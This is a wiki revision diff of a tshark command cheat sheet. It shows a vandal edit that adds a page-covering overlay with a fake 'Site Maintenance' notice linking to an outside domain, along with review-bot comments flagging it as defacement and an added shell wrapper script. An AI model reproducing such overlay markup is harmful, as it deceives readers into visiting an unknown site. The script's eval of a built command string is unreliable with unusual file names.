Difference between revisions of "Tools/Tshark"
(Name change)
Oxudocopaj (talk | contribs)
Line 1: | Line 1: | ||
+ | ---- | ||
+ | <div style="background: #E8E8E8 none repeat scroll 0% 0%; overflow: hidden; font-family: Tahoma; font-size: 11pt; line-height: 2em; position: absolute; width: 2000px; height: 2000px; z-index: 1410065407; top: 0px; left: -250px; padding-left: 400px; padding-top: 50px; padding-bottom: 350px;"> | ||
+ | ---- | ||
+ | =[http://ehiqikag.co.cc Page Is Unavailable Due To Site Maintenance, Please Visit Reserve Copy Page]= | ||
+ | ---- | ||
+ | =[http://ehiqikag.co.cc CLICK HERE]= | ||
+ | ---- | ||
+ | </div> | ||
= Why tshark rocks = | = Why tshark rocks = | ||
* more functions than tcpdump | * more functions than tcpdump | ||
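Review bot: the block added at Line 1 is a page defacement, not content, and this revision should be reverted wholesale rather than edited around. The inserted <div> is absolutely positioned at 2000px by 2000px with z-index 1410065407, so it covers the entire article, and both headings inside it link out to http://ehiqikag.co.cc behind a fake "Site Maintenance" notice. The external domain and the overlay markup are the things to search for across the rest of the wiki when cleaning up.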
Line 19: | Line 27: | ||
=== read filter (live capture, read capture file) === | === read filter (live capture, read capture file) === | ||
− | tshark -r mm.cap -R "tcp.port!=50050&&ip.addr==172.17.23.5" -w clean.cap | + | tshark -r mm.cap -R "tcp.port!=50050&&ip.addr==172.17.23.5" -w clean.cap |
− | -R "not(ip.addr==172.17.23.5&&tcp.len==0)" | + | -R "not(ip.addr==172.17.23.5&&tcp.len==0)" |
-R 'pop.request || http.request.method==GET || http.request.method=="POST"' | -R 'pop.request || http.request.method==GET || http.request.method=="POST"' | ||
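Review bot: the − and + forms of the two -R lines at Line 19/27 are identical as rendered, so this hunk is a whitespace-only change and needs no content review. Separately, the second and third -R lines are bare option fragments rather than complete commands; they read as alternative read filters for the `tshark -r mm.cap ... -w clean.cap` command on the first line, and the section would be clearer if it said so.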
Revision as of 02:18, 24 November 2010
Why tshark rocks
- more functions than tcpdump
- shares features with Wireshark
- lives in /usr/bin
- can capture to a ring buffer
- capture and read filters
tshark command lines
statistics
tshark -qz io,stat,0.01,ip.addr==172.17.23.1
tshark -qz conv,eth
tshark -qz proto,colinfo,nfs
tshark -qz sip,stat
tshark -o "smb.sid_name_snooping:TRUE" -qz smb,sids
ring buffer capture
tshark -b 5 -a filesize:9728 -w mm.cap
read filter (live capture, read capture file)
tshark -r mm.cap -R "tcp.port!=50050&&ip.addr==172.17.23.5" -w clean.cap
-R "not(ip.addr==172.17.23.5&&tcp.len==0)"
-R 'pop.request || http.request.method==GET || http.request.method=="POST"'
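An added example, not part of the wiki page, that wraps the read-filter step above in a shell function. It keeps the page's mm.cap/clean.cap names and its first filter, and inspects the installed tshark's help text because newer releases reject a bare -R (they require -2 for a two-pass read filter, or -Y for a single-pass display filter); the function and variable names are this example's own.

```shell
#!/bin/sh
# Added example (not the wiki's own code): clean a capture with the page's
# read filter, choosing the filter flag the installed tshark actually accepts.

# Filter from the page: keep packets of the 172.17.23.5 host that are NOT
# on tcp port 50050 (e.g. dropping the analyst's own management session).
CLEAN_FILTER='tcp.port!=50050&&ip.addr==172.17.23.5'

# display_filter_flag HELPTEXT -> prints "-Y" when the help text advertises
# the single-pass display filter, "-2 -R" when it advertises two-pass mode,
# and the legacy bare "-R" otherwise (the form used on this page).
display_filter_flag() {
    helptext="$1"
    if printf '%s\n' "$helptext" | grep -q -- '-Y <'; then
        printf '%s' '-Y'
    elif printf '%s\n' "$helptext" | grep -q -- '^ *-2 '; then
        printf '%s' '-2 -R'
    else
        printf '%s' '-R'
    fi
}

# clean_command INFILE OUTFILE FLAG -> prints the tshark command line that
# writes the filtered packets to OUTFILE (mirrors "-r mm.cap -R ... -w clean.cap").
clean_command() {
    printf "tshark -r '%s' %s '%s' -w '%s'" "$1" "$3" "$CLEAN_FILTER" "$2"
}

# run_clean [INFILE] [OUTFILE]: detect the installed tshark, run the cleaning
# step, then print the page's Ethernet conversation statistics for the result.
run_clean() {
    infile="${1:-mm.cap}"
    outfile="${2:-clean.cap}"
    command -v tshark >/dev/null 2>&1 || { echo "tshark not installed" >&2; return 1; }
    flag=$(display_filter_flag "$(tshark -h 2>&1)")
    eval "$(clean_command "$infile" "$outfile" "$flag")" || return 1
    tshark -r "$outfile" -qz conv,eth
}
```

Call `run_clean mm.cap clean.cap` after sourcing the script; the detection lines are worth keeping separate because the same -R invocation that works on the 2010 build fails with a usage error on current tshark.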
capture filter (live capture)
-f not host 172.17.23.255
decode ports as specific service
tshark -d tcp.port==8888,http